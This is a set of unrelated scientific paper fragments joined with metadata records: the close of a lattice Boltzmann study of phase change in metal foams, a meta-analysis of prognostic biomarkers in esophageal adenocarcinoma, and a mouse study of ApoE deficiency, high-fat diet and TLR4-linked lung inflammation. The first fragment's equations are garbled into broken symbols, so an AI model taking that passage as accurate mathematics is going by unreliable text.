In summary, an enthalpy-based MRT-LB method has been developed for solid-liquid phase change heat transfer in metal foams under LTNE condition. In the method, the moving solid-liquid phase interface is implicitly tracked through the liquid fraction, which is simultaneously obtained when the energy equations of PCM and metal foam are solved. The present method has three distinctive features. First, the iteration procedure has been avoided, thus it retains the inherent merits of the standard LB method and is superior over the iteration method in terms of accuracy and computational efficiency. Second, by using the volumetric LB scheme, the no-slip velocity condition in the interface and solid phase regions can be accurately realized. Moreover, the MRT collision model is employed, and with additional degrees of freedom, it has the ability to reduce the numerical diffusion across phase interface induced by solid-liquid phase change. For solid-liquid phase change heat transfer in metal foams, it has been unequivocally demonstrated that the MRT method is superior over its BGK counterpart in terms of accuracy and numerical stability.
Detailed numerical tests of the enthalpy-based MRT-LB method are carried out for two types of solid-liquid phase change heat transfer problems, including the conduction-induced solidification in a semi-infinite domain and melting coupled with natural convection in a square cavity filled with metal-foam-based PCM. It is found that the present results are in good agreement with the FDM or FVM results, which demonstrate that the present method can be served as an accurate and efficient numerical tool for studying metal foam enhanced solid-liquid phase change heat transfer in LHS.
Finally, comparisons and discussions are made to offer some insights into the roles of the collision model, volumetric LB scheme, enthalpy formulation, and relaxation rate ζ e in the enthalpy-based MRT-LB method, which are very useful for practical applications.
energy equation of the MRT-LB equation (31). To this end, the following multiscale expansions of g n , the derivatives of time and space, and the source term are introduced (0) (1) 2 (2) g g g g = + + + n n n n L ε ε , where ε ( ) is a small expansion parameter. Taking a second-order Taylor series expansion to Eq.
where ( , ) x y E E E = T , in which | 2018-04-03T04:58:28.681Z | 2016-12-28T00:00:00.000 | {
"year": 2016,
"sha1": "493ffab684d9aa64a0339d55f10429cf5edb61f3",
"oa_license": null,
"oa_url": "http://arxiv.org/pdf/1701.00702",
"oa_status": "GREEN",
"pdf_src": "Arxiv",
"pdf_hash": "493ffab684d9aa64a0339d55f10429cf5edb61f3",
"s2fieldsofstudy": [
"Physics"
],
"extfieldsofstudy": [
"Physics",
"Medicine",
"Materials Science"
]
} |
52165311 | pes2o/s2orc | v3-fos-license | A systematic review and meta-analysis of prognostic biomarkers in resectable esophageal adenocarcinomas
Targeted therapy is lagging behind in esophageal adenocarcinoma (EAC). To guide the development of new treatment strategies, we provide an overview of the prognostic biomarkers in resectable EAC treated with curative intent. The Medline, Cochrane and EMBASE databases were systematically searched, focusing on overall survival (OS). The quality of the studies was assessed using a scoring system ranging from 0–7 points based on modified REMARK criteria. To evaluate all identified prognostic biomarkers, the hallmarks of cancer were adapted to fit all biomarkers based on their biological function in EAC, resulting in the features angiogenesis, cell adhesion and extra-cellular matrix remodeling, cell cycle, immune, invasion and metastasis, proliferation, and self-renewal. Pooled hazard ratios (HR) and 95% confidence intervals (CI) were derived by random effects meta-analyses performed on each hallmarks of cancer feature. Of the 3298 unique articles identified, 84 were included, with a mean quality of 5.9 points (range 3.5–7). The hallmarks of cancer feature ‘immune’ was most significantly associated with worse OS (HR 1.88, (95%CI 1.20–2.93)). Of the 82 unique prognostic biomarkers identified, meta-analyses showed prominent biomarkers, including COX-2, PAK-1, p14ARF, PD-L1, MET, LC3B, IGFBP7 and LGR5, associated to each hallmark of cancer.
Results
Study characteristics. All 3,298 identified articles were screened on title and abstract (Fig. 1). After assessing 466 articles on full text, 84 articles were included . Six articles were grouped in the adapted hallmark of cancer 'multiple' , resulting in 78 articles that could be included in the meta-analysis, investigating a total population of 12,876 EAC patients. The main characteristics of the studies are shown in supplementary Table S1. A total of 82 unique biomarkers were identified. The majority of the biomarkers were detected by immunohistochemistry (IHC) or a combination of IHC and an in situ hybridization method (ISH). Less frequently applied detection methods were PCR, RNA sequencing, DNA sequencing and one article used a combination of reverse phase protein array (RPPA) analysis, reverse transcriptase-PCR and IHC 95 . Most (N = 61) articles included a study population consisting of EAC only, 12 articles included an EAC population that consisted of ≥70% adenocarcinomas, 11 articles performed separate OS analyses on EAC and other histological subtypes. Of the assessed patients, 1822 (14.2%) received prior chemo(radiation)therapy. The mean study sample size and IF of the articles was 152 patients (standard deviation = 112.16) and 4.54, respectively. Quality assessment. Assessment of the study quality using the adapted REMARK criteria, resulted in a mean quality of 5.9 points (range 3.5-7) (Supplementary Table S2). Three studies had a low quality score, and were included in the sensitivity analyses 31 . In general, points were lacking in quality criteria C5; reporting if patients received therapy and if so, specifying the chemo(radio)therapy regimen. In addition, C1; a representative cohort with clear baseline characteristic and C2; reasons of patient drop-out, were often absent. A positive correlation (R = 0.480) was observed comparing study size and the impact factor of the journal in which the study was published (p = 0.0005) ( Supplementary Fig. S3). There was no correlation (R = 0.058) between the study quality assessed by the adapted REMARK criteria and impact factor (p = 0.601).
Proliferation. The majority of the biomarkers studied are involved in tumor cell proliferation, of which HER2, EGFR, cyclin D, KI67 and MTOR were the most frequently reported (Fig. 2). Subgroup analysis on EGFR demonstrated an association with worse OS, HR 1.43 (95% CI 1.04-1.95). Analyses of the HER2 subgroup, however, showed no significant association with OS, HR 1.28 (95% CI 0.96-1.70). HER2 remained not significantly associated with worse OS when evaluating the HER2 subgroup by including only data on HER2 expression assessed by means of the gold standard (IHC and in case of equivocal HER2 expression (Hoffman scoring system 2+) an additional in situ hybridization method 96 ), or if data on EAC with Barrett's esophagus (BE) segment was replaced by data on EAC without BE ((HR 1.09 (95%CI 0.46-2.60)) and (HR 1.33 (95%CI 0.78-2.28)), respectively) ( Table 1). The overall pooled effect of the proliferation feature was significantly associated with worse OS (HR 1.41 (95%CI 1.22-1.63)), however, significant test heterogeneity was found. IGFBP7, a member of the insulin like growth factor receptor family, was identified as most promising prognostic biomarker in this hallmarks of cancer feature. Funnel plot analyses showed no indication for publication bias (Supplementary Material S4).
Hallmark specific markers. All identified biomarkers and hallmarks of cancer features are summarized in Fig. 3. The potential of all identified prognostic biomarkers was evaluated by assembling the biomarkers according to their main function in tumor biology in their corresponding hallmarks of cancer feature. Performing meta-analysis on all features, most were significantly associated with worse OS, except metabolism (HR 1.56 (95%CI 0.98-2.47)), and self-renewal (HR 1.08, (95%CI 0.81-1.43)). The hallmark of cancer feature 'immune' was most significantly associated with worse OS (HR 1.88, (95%CI 1.20-2.93)). Of the 82 unique prognostic biomarkers identified, meta-analyses showed several promising biomarkers, including COX-2, PAK-1, p14ARF, PD-L1, MET, LC3B and LGR5, associated to each hallmark of cancer feature. After excluding low study quality articles, there was no significant association with OS in the group cell adhesion (N = 1, n = 52, SPARC and SPP1; HR 1.49 (95% CI 1.07-2.07) to HR 1.24 (95% CI 0.83-1.86), respectively) ( Table 2) 31,45,58 . Additional sensitivity analyses on EAC treated with surgery as single treatment modality vs. EAC treated with neoadjuvant treatment and surgery, the hallmarks of cancers feature 'cell cycle' was not significantly associated with OS (HR 1.43 (95%CI 1.08-1.89) to HR 1.09 (95%CI 0.75-1.57), respectively) although the same biomarkers were tested. The feature 'metabolism' remained not significantly associated with OS. After sensitivity analyses, the prognostic biomarkers identified as most promising remained unchanged for each hallmark of cancer feature. Funnel plot analyses showed no indication for publication bias.
Discussion
This review summarizes the great diversity of prognostic biomarkers studied in EAC thus far. Evaluating the biomarkers by grouping them based on their role in tumor biology to the most fitted hallmark of cancer feature, 82 unique biomarkers could be identified.
Interestingly, the hallmark of cancer feature 'immune' presented itself as most significant associated with worse OS, and therefore may harbor potential to apply targeted therapies. Due to increased understanding of the tumor immunomicro-environment, and promising trial results, new immune based therapies are recently emerging, such as the PD-L1/PD1 targeting agents nivolumab and pembrolizumab 97 . Targeting PD-L1/PD-1, a critical immune checkpoint, releases the inhibitory effect on both the humoral and cellular immune response, activating T-cells to enhance the antitumor response. These PD-1 pathway inhibitors have previously been FDA approved in several solid tumors, including melanoma and non-small lung cancer. Indeed here we identify PD-L1, a ligand of the co-inhibitory receptor PD-1, as the most promising prognostic biomarker included in this hallmarks of cancer feature. However, the clinical applicability of these drugs has not been proven in resectable EAC yet and whether PD-1 is a predictive biomarker, reflective of response to treatment, remains to be elucidated 4,97 .
For all other hallmarks of cancer features promising prognostic biomarkers were identified as well, including COX-2, PAK-1, p14ARF, MET, LC3B, IGFBP7 and LGR5. For the MET-, IGFBP7, and LGR5 pathways targeted therapies have already been studied in other cancer types with varying results, however, the potential to target these biomarkers in EAC is yet to be investigated 98,99 . Likewise, the inhibition of CDK4/6 in p14ARF mutant patients by small molecules or pan-CDK inhibitors is being invested as add-on to standard chemotherapy backbones, potentially enabling blockage of unrestricted cell division caused by p14ARF mutations 100 . Non-steroidal anti-inflammatory drugs (NSAID's), inhibiting COX-2, are commonly used and safe. Hence, inhibition of COX-2, an important regulator of cell growth, differentiation and apoptosis, may be a valuable contribution in the treatment of EAC. Thus far, COX-2 has been demonstrated to be involved in the neoplastic formation of esophageal cancer 101 . Moreover, the use of NSAID's, is associated with a reduced risk of EAC development and is proven to reduce cell growth in 8 esophageal cell lines. Contrary, yet little is known about the potential drugability of PAK-1 in cancer, even though the recently elucidated central role in oncogenic signaling has enhanced interest in small-molecule based PAK-1 targeting 102 . Similarly, merely in vitro the inhibition of autophagy by blocking LC3B has been explored in oncological diseases. Therefore, the therapeutic potential remains to be clarified.
Even though promising prognostic biomarkers were identified, limitations should be recognized. Firstly, after performing sensitivity analysis on the study quality, the feature cell adhesion was no longer significantly associated with OS when excluding articles scoring low on the adapted REMARK criteria 31,45,58 . In addition, as it is known that studies with low quality hamper extrapolation of the data to clinical practice, it is surprising to notice that study size and impact factor were correlated, while no correlation between the study quality and the impact factor was found. Although after sensitivity analyses on articles scoring low on the adapted REMARK criteria the same promising biomarkers were still identified, the varying study quality is worrying. Frequently, articles failed to report the received therapy, and if this information was supplied, often did not specify the treatment regimen. As nowadays neoadjuvant treatment has become standard of care for operable EAC, reporting these baseline characteristics has become increasingly important.
In this meta-analyses 1822 (14.2%) resection specimens were evaluated on prognostic biomarker status after patients received neoadjuvant chemo(radiation)therapy. It should be noted that in specimens of good-responders no, or a few, remaining tumor cells may be found, biasing the prognostic potential of the assessed biomarker. Moreover, if post-neoadjuvant therapy samples are included in biomarker analyses, treatment regimens should be clearly described. It is known that a better response to therapy is attained with neoadjuvant chemoradiation therapy than if patients receive radiation therapy as single treatment modality. This could further bias the results found. In addition, when extrapolating these results to a predictive setting for the identification of new therapy options, these biomarkers might not have predictive potential in the neoadjuvant setting. Indeed, sensitivity analyses on articles reporting on patients who received neoadjuvant therapy demonstrated the influence of these treatment regimens on the association between biomarker status and survival. The feature 'cell cycle' was significantly associated with worse OS in all patients, and, when testing the same biomarkers, no longer harbored this association with survival if solely neoadjuvant treated EAC was included in the analysis. Since commonly used DNA-damaging chemotherapeutics as carboplatin and paclitaxel have influence on the cell cycle, this effect was expected, highlighting the importance of reporting the received treatment regimen. The importance of clear reporting standards for biomarker research and standardization of the detection method used is also demonstrated by subgroup analyses on HER2. In contrast to the current notion, no association with decreased survival was found when plotting the data of all articles reporting on the prognostic potential of HER2. When exclusively including data on HER2 positivity assessed by means of the gold standard, IHC and in case of equivocal HER2 expression (Hoffman scoring system 2+) an additional in situ hybridization method, the association with worse OS remained not significant 5,103 . The significant test heterogeneity found in the corresponding hallmark of cancer feature 'proliferation' could at least partly be attributed to the varying detection methods applied. As all used tests have a unique sensitivity and specificity, outcomes can be greatly influenced by the method of biomarker assessment. The applied detection method will not only reflect underlying tumor biology, but also affect the relation of the biomarker with prognostic outcomes and targetability. For example, it has been demonstrated that solely assessing HER2 positivity by amplification of the HER2-gene with an in situ hybridization method does not correlate to efficacy of HER2-targeted therapy 103 . Likewise, different IHC cutoff-points of biomarker positivity influence both prognostic and predictive outcomes. As has been demonstrated in this meta-analysis, even for well-known biomarkers such as HER2, used in clinical practice, articles use varying definitions of biomarker positivity, thereby limiting comparison of data. Several promising biomarkers in resectable EAC have been identified, however, in order to stratify patients in accordance to their tumor biology, and to develop new targeted anti-cancer treatments, future research is needed. First, standardization of reporting on biomarker research is needed to further identify prognostic biomarkers. Subsequently, large-scale multicenter randomized-controlled trials should be conducted to validate the clinical applicability of these biomarkers and to evaluate their potential targetability.
To conclude, a wide variety of prognostic proteins and their expression have been studied in EAC treated with curative intent. Despite varying study quality of the published data, promising biomarkers could be identified, including COX-2, PAK-1, p14ARF, PD-L1, MET, LC3B, IGFBP7 and LGR5. The clinical application and targetability of these biomarkers as anti-cancer therapy in operable EAC should be addressed in future research.
Methods
Search strategy. Literature was retrieved using the Medline, Cochrane and Embase databases on the 19 th of January 2017 to identify articles published in the last 10 years, with the publication date restricted to the first of January 2007 until the first of January 2017. In addition to MESH terms, free text words were added to the search, to include all relevant articles that might not have assigned MESH terms yet. The full search is available in the supplementary information S5.
Screening and selection of studies. All titles, abstracts and full text articles were screened independently by two researchers (AC and EAE), discrepancies were resolved by discussion. Articles were selected based on the following criteria; (i) the research population included adenocarcinomas of the esophagus or the gastro-esophageal junction, defined as Siewert class I and II, that could be treated with curative intent (ii) should report biomarker related overall survival (OS) data, described with hazard ratios (HR), 95% confidence intervals (CI), and p-value. If both EAC and ESC were studied, the research population should include at least 70% EAC or display separate survival analysis. Reviews, case reports, (meeting) abstracts, phase I studies and articles without full-text in English were excluded. When articles reported on the same biomarker(s) investigating the identical patient population, the publication examining the most biomarkers was included. Endnote X7 (Clarivate Analytics, Boston, USA) was used to select and screen the literature.
Data extraction and outcomes. Data extraction was done by AC and EAE following a predefined protocol and double checked until consensus was reached. The following data was extracted: first author, publication year, journal, patient population (EAC only, >70% EAC or EAC and ESC with separate survival analysis), tumor material studied (blood, biopsy, resection specimen or a combination), reported tissue handling, method of biomarker detection, used scoring methods and cut-off values for biomarker positivity, received therapy (yes (including a clear description of the treatment regimen), no, or not reported (NR)), the duration of follow-up, and reported confounders in multivariate analyses. Lastly, the primary outcome of this review, overall survival data of univariate and/or multivariate analyses presented as HR, 95% CI, and p-value. The impact factor (IF) of journals at the time of publication of the studies were extracted from bioxbio.com/if/.
Study quality assessment.
To assess the quality of the included studies the REporting recommendations for tumor MARKer prognostic studies (REMARK) criteria for biomarker studies were adapted into a scoring system (Table 3) 11 . The adapted scoring criteria were chosen by discussion between AC, EAE, MvO and HvL. The articles could be scored 1 point per item, with a maximum of 7 points. In case of ambiguity or incompleteness, half a point was allocated. A study was defined of low quality when ≤3.5 points were assigned. The study quality was assessed by AC and EAE, in case of disagreement consensus was reached by discussion.
Statistics. The potential of all identified prognostic biomarkers was evaluated by grouping the biomarkers according to their main function in tumor biology in the corresponding hallmark of cancer 104 . To fit all identified biomarkers, the hallmarks of cancer were adapted, resulting in the following features: angiogenesis, cell adhesion and extra-cellular matrix remodeling, cell cycle, immune, invasion and metastasis, metabolism, proliferation, and self-renewal. Some articles showed data on a cluster of genes, these were assembled in the hallmarks of cancer feature 'multiple' . Due to the heterogeneous scope of action of the biomarkers, we did not perform meta-analysis on papers included in the 'multiple' group. Pooled hazard ratios (HR) and 95% confidence intervals (CI) were derived by random effects meta-analyses performed on each hallmark of cancer feature. HR and 95%CI data of univariate and multivariate analysis were combined in the meta-analysis; data derived from multivariate analysis was used as default, but when absent, univariate values were used. If the data was related to absence rather than presence of the biomarker, the HR data were inversed. When identical biomarkers were reported in more than two studies, these duplicate biomarkers were included in subgroup analysis. In order to determine the influence of a low quality score, sensitivity analyses were performed on studies with a low study quality on the adapted REMARK criteria scale. Additional sensitivity analyses were conducted on studies showing data on both EAC treated with surgery as single treatment modality and neoadjuvant treated EAC. Finally, the most promising biomarker for each hallmark of cancer feature was selected based on the most optimal combination of a high HR and small 95% CI. Consensus was reached between AC, EAE, MvO and HvL on the selected biomarkers. Publication bias was evaluated by means of a Funnel plot on all hallmarks of cancer features. Random effects meta-analyses were performed in Review Manager V5 (The Cochrane Collaboration, Copenhagen, Denmark). Pearson's correlations with linear regression analysis between IF, adapted REMARK quality score, and patient cohort size were performed using GraphPad Prism 6 (GraphPad Software, La Jolla, CA, USA).
Ethics statement. This article does not contain any studies with human or animal subjects performed by any of the authors. Table 3. The adapted version of the REporting recommendations for tumor MARKer prognostic studies (REMARK) criteria for biomarker studies 11 . A study could be allocated one point for each of the seven criteria, in case of ambiguity, half a point was assigned. Sensitivity analyses were performed on studies assigned ≤3,5 points on the adapted REMARK criteria scale. | 2018-09-14T14:08:25.706Z | 2018-09-05T00:00:00.000 | {
"year": 2018,
"sha1": "63fba306946488083ede831d15b3c93950046c80",
"oa_license": "CCBY",
"oa_url": "https://www.nature.com/articles/s41598-018-31548-6.pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "d80bb549a2b8e8fc9643561c119e573873cc57a7",
"s2fieldsofstudy": [
"Medicine",
"Biology"
],
"extfieldsofstudy": [
"Medicine"
]
} |
22254242 | pes2o/s2orc | v3-fos-license | Apolipoprotein E deficiency and high-fat diet cooperate to trigger lipidosis and inflammation in the lung via the toll-like receptor 4 pathway
Apolipoprotein E deficiency (ApoE−/−) combined with a high-fat Western-type diet (WD) is known to activate the toll-like receptor (TLR4) pathway and promote atherosclerosis. However, to date, the pathogenic effects of these conditions on the lung have not been extensively studied. Therefore, the present study examined the effects of ApoE−/− and a WD on lung injury and investigated the underlying mechanisms. ApoE−/− and wild-type mice were fed a WD or normal chow diet for 4, 12 and 24 weeks. Lung inflammation, lung cholesterol content and cytokines profiles in bronchoalveolar lavage fluid (BALF) were determined. TLR4 and its main downstream molecules were analyzed with western blot analysis. In addition, the role of the TLR4 pathway was further validated using TLR4-targeted gene silencing. The results showed that ApoE−/− mice developed lung lipidosis following 12 weeks of receiving a WD, as evidenced by an increased lung cholesterol content. Moreover, dependent on the time period of receiving the diet, those mice exhibited pulmonary inflammation, which was manifested by initial leukocyte recruitment (at 4 weeks), by increased alveolar septal thickness and mean linear intercept as well as elevated production of inflammation mediators (at 12 weeks), and by granuloma formation (at 24 weeks). The expression levels of TLR4, myeloid differentiation primary response 88 (MyD88) and nuclear factor kappa B were markedly upregulated in ApoE−/− WD mice at week 12. However, these effects were ameliorated by shRNA-mediated knockdown of TLR4. By contrast, ApoE−/− ND or wild-type WD mice exhibited low-grade or no inflammation and mild lipidosis. The levels of TLR4 and MyD88 in those mice showed only minor changes. In conclusion, ApoE deficiency acts synergistically with a WD to trigger lung lipidosis and inflammation at least in part via TLR4 signaling.
Introduction
There is compelling evidence that apolipoprotein E deficiency (ApoE -/-) combined with a high-fat diet regulates toll-like receptor 4 (TLR4) expression and promotes atherosclerosis development. Massaro and Massaro (1) reported that ApoE -/mice displayed reduced alveologenesis as compared with wild-type strain controls, and that ApoE -/had an effect on lung pathological changes. Similarly, Naura et al (2) demonstrated that ApoE -/mice on a high-fat diet displayed lung inflammation. Goldklang et al (3) indicated that ApoE -/mice on a high-fat Western-type diet (WD) showed emphysema due to TLR4 activation (3). Samokhin et al (4) suggested that ApoE -/mice on a high-fat diet developed granulomas similar to those observed in human sarcoidosis. Accordingly, reports of the effects of HFD on lung pathological changes in ApoE -/mice differ greatly.
Macrophages are important inflammatory cells implicated in the initiation of inflammation, and they have critical roles in the pathogenesis of foam cell formation (5). TLR4 is a key initiator of innate immunity that is able to promote an adaptive immune response. TLR4 recognizes lipopolysaccharide (LPS), resulting in the activation of the myeloid differential factor 88 (MyD88)-and toll-interleukin-1 receptor domain-containing adapter inducing interferon-β (TRIF)-dependent downstream signaling pathways. TLR4 signalling has a critical role in the progression of atherosclerosis and lung inflammation (6,7). A previous study by our group revealed that ApoE -/mice developed pulmonary capillaritis via up-regulation of TLR4 and nuclear factor (NF)-κB (8). However, to date, the role of TLR4
Apolipoprotein E deficiency and high-fat diet cooperate to trigger lipidosis and inflammation in the lung via the toll-like receptor 4 pathway
signalling in the pathogenesis of lung lipidosis have not been studied, to the best of our knowledge. The aim of the present study was to determine whether ApoE deletion combined with hypercholesterolemia induces lung inflammation and lipidosis. Furthermore, TLR4 knockdown was employed to investigate whether TLR4 signalling is implicated in those pathological changes.
Materials and methods
Animals and experimental design. All of the procedures and protocols were approved by the Animal Care Committee of Fujian Medical University (Quanzhou, China) and followed the guidelines of the Animal Management Rules of the Chinese Ministry of Health. Eighty eight-week-old male ApoE -/mice and sixty age-and gender-matched wild-type mice with a C57BL/6 genetic background (B6) were obtained from the Peking University Animal Centre (Beijing, China). In the first group, thirty ApoE -/and B6 mice were fed a WD (containing 0.25% cholesterol and 15% cocoa butter; MD12032) or a normal chow diet (ND; MD12031; Yangzhou Medicience Ltd, Yangzhou, China) for 4, 12 or 24 weeks, respectively (n=10 in each group). In the second group, the ApoE -/and wild-type mice were injected with short hairpin TLR4 interference lentivirus (Lv-shTLR4) or empty vector (both from Invitrogen Life Technologies, Paisley, UK) at 1x10 8 transducing units for each mouse through the caudal vein (n=10). They were fed the WD for 12 weeks. All the animals were under standardized lighting conditions (12-h light/dark cycle) and temperature (21±1˚C). Mineral water was administered ad libitum. At the end of the experiment the mice were sacrificed by overdose of pentobarbital (90 mg/kg; intraperitoneal injection; Huayehuanyu Ltd, Beijing, China). The bronchoalveolar lavage fluid (BALF) was collected and the left lung lobe tissue was collected for histomorphological examination, whereas the right lung lobe tissue was collected for RNA and protein analysis.
Hematoxylin and eosin (HE) staining for lung pathomorphological changes. The lung tissue was stained with hematoxylin and eosin (HE; Sigma-Aldrich, St. Louis, MO, USA). The mean linear intercept and septal thickness were quantified as described by Wendel et al (9). This assessment was repeated for 10 terminal respiratory units in one random tissue section per mouse. All the images were acquired using a BX51 microscope (Olympus, Center Valley, PA, USA) and analyzed using Image-Pro Plus 6.0 (Media Cybernetics, Inc., Bethesda, MD, USA). The evaluation was performed by two experienced pathologists who were blinded to the treatments that the mice had received, according to methods previously described (10).
Oil red O staining for lipidosis in the lung and quantitation of pulmonary cholesterol content. For assessment of lipidosis, the frozen lung sections were stained with Oil Red O (Sigma-Aldrich). The cholesterol content of the lung tissue was quantified according to Bates et al (11). The free and total cholesterol contents were calculated using a cholesterol standard (Sigma-Aldrich). The cholesteryl ester content was calculated by subtracting the free cholesterol from the total cholesterol for each sample. The cholesterol content was expressed as 'micrograms of lipid per gram of animal'.
Double immunofluorescent staining for assessment of TLR4 in macrophages. For the localization of TLR4 expression in macrophages, double immunofluorescence staining using the CD68 macrophage marker and anti-TLR4 (all diluted at 1:100; Abcam, Cambridge, UK) was performed on the lung sections. CD68 and TLR4 double-labelled cells were quantified as a fraction of the total cell nuclei in each lung section.
Serum lipid analysis. The fasting serum samples were collected in 20-week-old mice of different genotypes following fasting for 8 h. The total cholesterol (TC), triglycerides (TG), high-density lipoprotein cholesterol (HDL-C) and non-HDL-C were measured as previously described (13) using reagents from Nanjing KeyGen Biotech Co., Ltd. (Nanjing, China). Lentiviral short hairpin RNA (Lv-shRNA)-mediated TLR4 gene silencing. The shRNA targeting of the TLR4 gene (GenBank accession no., NM021297.2) was screened and tested according to the protocol of according to Zhu et al (14). The target sequence was designed and chemically synthesized by the United Gene Company (Shanghai, China). This shRNA comprises an RNA duplex containing a sense strand: 5'-GATCCGCACTCTTGATTGC AGTTTCATTCAAGAGATGAAACTGCAATCAAGAGTG CTTTTTTG-3' and an antisense strand: 5'-AATTCAAA AAAGCACTCTTGATTGCAGTTTCATCTCTTGAATGA AACTGCAATCAAGAGTGCG-3'. The inserted TLR4 cDNA sequence was confirmed by DNA sequencing.
Reverse transcription quantitative polymerase chain reaction (RT-qPCR). qPCR was performed to test the efficacy of TLR4 knockdown. Total RNA was isolated from the lung tissue using the RNAiso Plus kit (Takara Biotechnology Co., Ltd., Dalian, China). A total of 500 ng RNA was used as the template for cDNA generation with the RNA RT kit (Takara Bio, Inc., Shiga, Japan). cDNA was immediately reverse-transcribed from the isolated RNA and subsequently qPCR was performed using Power SYBR Green PCR Master Mix (Takara Bio, Inc.) on the Master Mix System (Roche, Basel, Switzerland). The primer sequences (5' to 3') were TLR4 forward, ATGGCATGGCTTACACCACC and reverse, GAGGCCAATTTTGTCTCCACA; GADPH forward, AGGTCGGTGTGAACGGATTTG and reverse, TGTAGACCATGTAGTTGAGGTCA. The PCR conditions were as follows: Initial denaturation at 95˚C for 5 min, denaturation at 94˚C for 45 sec, annealing at 50˚C for 1 min and extension at 72˚C for 1 min. The PCR was performed for 35 cycles followed by a final extension step at 72˚C for 10 min. The PCR product was quantitatively analyzed with LabWorks 4.5 analysis software (UVP LLC, Upland, CA, USA). Relative quantification of the target gene mRNA was performed using the comparative ΔΔCT-method, normalized to (GADPH) and a relevant ApoE -/empty vector control to obtain 2 -ΔΔCT .
Statistical analysis. All values are expressed as the mean ± standard error unless otherwise indicated. The group comparisons were performed using Student's t test (2-sample test) or analysis of variance. A P-value of 0.05 was regarded to indicate a statistically significant difference between values. The statistical analysis was performed using SPSS 17.0 software (SPSS, Chicago, IL, USA).
Age-dependent inflammation and lipidosis in the lungs of ApoE -/-WD mice.
In the ApoE -/mice receiving the WD for four weeks, inflammatory cell infiltration was noted around the capillaries and venules (Fig. 1A). Following WD for 12 weeks, the ApoE -/mice showed thickened alveolar septa, exudate-filled alveolar spaces, ruptured septa and bullae formation (Fig. 1B). Widely distributed granulomas were observed in the ApoE -/mice following WD for 24 weeks (Fig. 1C). By contrast, among the animals receiving ND treatment for 4 or 12 weeks, the ApoE -/mice displayed a minimal number of inflammatory cells in the peribronchiolar and perivascular sites ( Fig. 1D and 1E), and very few granulomas developed at 24 weeks of ND (Fig. 1F). Those manifestations were absent in the ApoE -/mice fed an ND for four weeks or in the wild-type mice fed a WD for 24 weeks (Fig. 1G-L). Collectively, these data suggested that pulmonary inflammation developed more extensively and earlier in the ApoE -/-WD mice than in the littermates on ND. In the wild-type mice on WD, no signs of inflammation were observed, as indicated by normal bronchioles and alveoli.
Lipid-laden cells were observed by oil red O staining in the septa and alveolar lumina in the ApoE -/-WD mice at 12 weeks (Fig. 1N), whereas scattered lipid-filled cells were observed in the ApoE -/-WD mice at 4 and 24 weeks (Fig. 1M and O) or the ApoE -/-ND littermates at 24 weeks. No foam cells were present in the wild-type mice on the WD even for 24 weeks (Fig. 1S-U).
Additionally, at 12 weeks, the alveolar septal thickness and mean linear intercept were obviously greater in the ApoE -/-WD mice when compared with that in the ApoE -/-ND or B6 WD mice. The ApoE -/-ND mice showed a marginal increase in alveolar septal thickness and mean linear intercept; however, with no statistical significance. The B6 WD mice exhibited normal alveoli and septal thickness.
The lung cholesteryl content quantitation showed that at 12 weeks, the total cholesterol content in the lungs of ApoE -/-WD mice was elevated 5.69-fold relative to that in the B6 WD mice and 4.08-fold compared to that in the ApoE -/-ND mice, predominantly due to marked elevation in cholesteryl ester levels. In ApoE -/-WD mice, cholesteryl ester was 29.48-fold higher than that in the B6 WD mice and 6.95-fold higher than that in the ApoE -/-ND mice. In the wild-type B6 mice, the levels of lung cholesterol were altered insignificantly, irrespective of the diet.
Increased TLR4 expression in pulmonary macrophages of ApoE -/-WD mice. TLR4 in macrophages is critical in pulmonary inflammation and lipidosis. To investigate the implications of TLR4 in macrophages in the pathogenesis of lung injury, TLR4 expression and lung macrophages were co-localised with double immunofluorescent staining. The CD68 + macrophages (green) in the lung were enriched in TLR4 (red). The ApoE -/mice fed a WD for 12 weeks exhibited markedly greater macrophage infiltration and TLR4 expression in the alveolar septum compared with that in the B6 WD mice (Fig. 2). The ApoE -/-ND mice displayed a moderately increased number of CD68 + TLR4 + cells (yellow) in the lung (Fig. 2).
TLR4 and its downstream activation in ApoE -/-WD mice.
MyD88/NF-κB and TRIF/IRF3 are key downstream molecules in the TLR4 signalling pathway. To determine whether these molecules were involved in pulmonary inflammation and lipidosis, the protein levels of TLR4, as well as its downstream MyD88-dependent (MyD88, NF-κB) and -independent (TRIF and IRF3) molecules in the lungs were detected by western blot analysis. Following WD for 12 weeks, the levels of TLR4, MyD88 and p-NF-κB were markedly upregulated in the ApoE -/mice compared with those in the B6 mice. The TRIF and IRF3 levels were significantly increased (Fig. 3). Among the mice receiving the ND, the levels of MyD88 and NF-κB in the ApoE -/mice were moderately elevated relative to those in the corresponding B6 controls; however, the expression levels of TRIF and IRF3 were marginally altered in the ApoE -/mice in comparison with those in the B6 animals.
Increased BALF levels of IFN-γ, TNF-α, IL-4, IL-6 and IL-17 in ApoE -/-WD mice. An inflammatory response involves the recruitment of immune cells and changes in cytokines. The levels of IFN-γ, TNF-α, IL-4. IL-6 and IL-17 in BALF were detected in the mice following 12-weeks of reciving their respective diet. In the ApoE -/mice, the levels of pro-inflammatory cytokines IFN-γ, TNF-α, IL-6 and IL-17 in BALF were markedly elevated by 8.7-fold, 9.5-fold, 3.0-fold and 3.8-fold, respectively, compared with those in the littermates on an ND. The anti-inflammatory cytokine IL-4 was significantly increased by 2.7-fold (Fig. 4). The levels of these cytokines were undetectable in the B6 mice receiving ND or WD.
Hyperlipidemia in the ApoE -/-WD mice. The serum lipids were detected to evaluate the effects of the high-fat Western-type diet on the lipid profiles of the experimental mice. Compared with those of their corresponding genotype mice receiving the ND, the serum TC, TG and non-HDL-C levels were markedly elevated in the ApoE -/mice receiving the WD, and, to a lesser extent, in the wild-type mice following 12 weeks of WD. The HDL-C levels in the ApoE -/mice decreased, whereas they remained comparable in the wild-type mice (Table I).
The lung cholesterol content, including the esterified and free cholesterol, was diminished (Fig 5). The serum lipid profiles changed insignificantly with the TLR4-shRNA lentivirus treatment (data not shown).
Inactivating the MyD88-dependent NF-κB downstream pathways by TLR4 interference. Following TLR4-targeted gene silencing, all the signalling molecules (MyD88, p-NF-κB, TRIF, IRF3) were downregulated by 46, 53, 15, and 29%, respectively, with a predominant inhibitory effect on the MyD88-dependent pathway. In the ApoE -/mice, levels of these signaling molecules in the lung remained significantly higher than those of the B6 counterparts fed the WD (Fig. 6).
